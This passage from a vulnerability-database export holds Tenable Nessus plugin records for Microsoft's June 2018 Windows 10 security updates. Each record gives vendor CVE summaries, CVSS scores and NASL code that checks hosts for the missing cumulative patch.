operating system is not vulnerable to this attack. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, the vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerability by correcting how privileges are\n enforced by Windows Hyper-V instruction emulation.\n (CVE-2018-8219)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8212, CVE-2018-8215,\n CVE-2018-8216, CVE-2018-8217, CVE-2018-8221)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8236)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-0982)\n\n - An elevation of privilege vulnerability exists in\n Windows when Desktop Bridge does not properly manage the\n virtual registry. An attacker who successfully exploited\n this vulnerability could run arbitrary code in kernel\n mode. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2018-8208, CVE-2018-8214)\");\n # https://support.microsoft.com/en-us/help/4284880/windows-10-update-kb4284880\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3dae2364\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4284880.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8231\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-06\";\nkbs = make_list('4284880');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"06_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4284880])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:13:14", "description": "The remote Windows host is missing security update 4284874.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2018-8169)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8211, CVE-2018-8212,\n CVE-2018-8215, CVE-2018-8216, CVE-2018-8217,\n CVE-2018-8221)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8239)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2018-8121)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-1036)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8227, CVE-2018-8229)\n\n - An information disclosure vulnerability exists when\n Windows allows a normal user to access the Wireless LAN\n profile of an administrative user. An authenticated\n attacker who successfully exploited the vulnerability\n could access the Wireless LAN profile of an\n administrative user, including passwords for wireless\n networks. An attacker would need to log on to the\n affected system and run a specific command. The security\n update addresses the vulnerability by changing the way\n that Windows enforces access permissions to Wireless LAN\n profiles. (CVE-2018-8209)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V instruction emulation fails to properly\n enforce privilege levels. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges on a target guest operating system. The host\n operating system is not vulnerable to this attack. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, the vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerability by correcting how privileges are\n enforced by Windows Hyper-V instruction emulation.\n (CVE-2018-8219)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8236)\n\n - An information disclosure vulnerability exists when Edge\n improperly marks files. An attacker who successfully\n exploited this vulnerability could exfiltrate file\n contents from disk. For an attack to be successful, an\n attacker must persuade a user to open a malicious\n website. The security update addresses the vulnerability\n by properly marking files. (CVE-2018-0871)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A security feature bypass vulnerability exists in\n Internet Explorer that allows for bypassing Mark of the\n Web Tagging (MOTW). Failing to set the MOTW means that a\n large number of Microsoft security technologies are\n bypassed. (CVE-2018-8113)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-0982)\n\n - An elevation of privilege vulnerability exists in\n Windows when Desktop Bridge does not properly manage the\n virtual registry. An attacker who successfully exploited\n this vulnerability could run arbitrary code in kernel\n mode. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2018-8208, CVE-2018-8214)", "edition": 21, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-06-12T00:00:00", "title": "KB4284874: Windows 10 Version 1703 June 2018 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8216", "CVE-2018-8205", "CVE-2018-1036", "CVE-2018-0982", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8211", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8239", "CVE-2018-8219", "CVE-2018-8169", "CVE-2018-0978", "CVE-2018-8208", "CVE-2018-8217", "CVE-2018-8226", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8209", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8121", "CVE-2018-8113", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8227", "CVE-2018-8214", "CVE-2018-8225", "CVE-2018-0871"], "modified": "2018-06-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_JUN_4284874.NASL", "href": "https://www.tenable.com/plugins/nessus/110490", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110490);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-0871\",\n \"CVE-2018-0978\",\n \"CVE-2018-0982\",\n \"CVE-2018-1036\",\n \"CVE-2018-1040\",\n \"CVE-2018-8113\",\n \"CVE-2018-8121\",\n \"CVE-2018-8169\",\n \"CVE-2018-8201\",\n \"CVE-2018-8205\",\n \"CVE-2018-8207\",\n \"CVE-2018-8208\",\n \"CVE-2018-8209\",\n \"CVE-2018-8210\",\n \"CVE-2018-8211\",\n \"CVE-2018-8212\",\n \"CVE-2018-8213\",\n \"CVE-2018-8214\",\n \"CVE-2018-8215\",\n \"CVE-2018-8216\",\n \"CVE-2018-8217\",\n \"CVE-2018-8219\",\n \"CVE-2018-8221\",\n \"CVE-2018-8225\",\n \"CVE-2018-8226\",\n \"CVE-2018-8227\",\n \"CVE-2018-8229\",\n \"CVE-2018-8231\",\n \"CVE-2018-8234\",\n \"CVE-2018-8235\",\n \"CVE-2018-8236\",\n \"CVE-2018-8239\",\n \"CVE-2018-8251\",\n \"CVE-2018-8267\"\n );\n script_bugtraq_id(\n 104326,\n 104328,\n 104331,\n 104333,\n 104334,\n 104336,\n 104337,\n 104338,\n 104339,\n 104340,\n 104343,\n 104353,\n 104356,\n 104360,\n 104361,\n 104364,\n 104365,\n 104368,\n 104369,\n 104373,\n 104379,\n 104380,\n 104382,\n 104389,\n 104391,\n 104392,\n 104393,\n 104394,\n 104395,\n 104398,\n 104401,\n 104404,\n 104406,\n 104407\n );\n script_xref(name:\"MSKB\", value:\"4284874\");\n script_xref(name:\"MSFT\", value:\"MS18-4284874\");\n\n script_name(english:\"KB4284874: Windows 10 Version 1703 June 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4284874.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2018-8169)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8211, CVE-2018-8212,\n CVE-2018-8215, CVE-2018-8216, CVE-2018-8217,\n CVE-2018-8221)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8239)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2018-8121)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-1036)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8227, CVE-2018-8229)\n\n - An information disclosure vulnerability exists when\n Windows allows a normal user to access the Wireless LAN\n profile of an administrative user. An authenticated\n attacker who successfully exploited the vulnerability\n could access the Wireless LAN profile of an\n administrative user, including passwords for wireless\n networks. An attacker would need to log on to the\n affected system and run a specific command. The security\n update addresses the vulnerability by changing the way\n that Windows enforces access permissions to Wireless LAN\n profiles. (CVE-2018-8209)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V instruction emulation fails to properly\n enforce privilege levels. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges on a target guest operating system. The host\n operating system is not vulnerable to this attack. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, the vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerability by correcting how privileges are\n enforced by Windows Hyper-V instruction emulation.\n (CVE-2018-8219)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8236)\n\n - An information disclosure vulnerability exists when Edge\n improperly marks files. An attacker who successfully\n exploited this vulnerability could exfiltrate file\n contents from disk. For an attack to be successful, an\n attacker must persuade a user to open a malicious\n website. The security update addresses the vulnerability\n by properly marking files. (CVE-2018-0871)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A security feature bypass vulnerability exists in\n Internet Explorer that allows for bypassing Mark of the\n Web Tagging (MOTW). Failing to set the MOTW means that a\n large number of Microsoft security technologies are\n bypassed. (CVE-2018-8113)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-0982)\n\n - An elevation of privilege vulnerability exists in\n Windows when Desktop Bridge does not properly manage the\n virtual registry. An attacker who successfully exploited\n this vulnerability could run arbitrary code in kernel\n mode. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2018-8208, CVE-2018-8214)\");\n # https://support.microsoft.com/en-us/help/4284874/windows-10-update-kb4284874\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?19db0c08\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4284874.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8231\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-06\";\nkbs = make_list('4284874');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"06_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4284874])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:13:13", "description": "The remote Windows host is missing security update 4284819.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2018-8169)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2018-8218)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - An denial of service vulnerability exists when Windows\n NT WEBDAV Minirdr attempts to query a WEBDAV directory.\n An attacker who successfully exploited the vulnerability\n could cause a denial of service. (CVE-2018-8175)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8239)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2018-8121)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8211, CVE-2018-8212,\n CVE-2018-8215, CVE-2018-8221)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - An Elevation of Privilege vulnerability exists when\n Cortana retrieves data from user input services without\n consideration for status. An attacker who successfully\n exploited the vulnerability could execute commands with\n elevated permissions. (CVE-2018-8140)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - An information disclosure 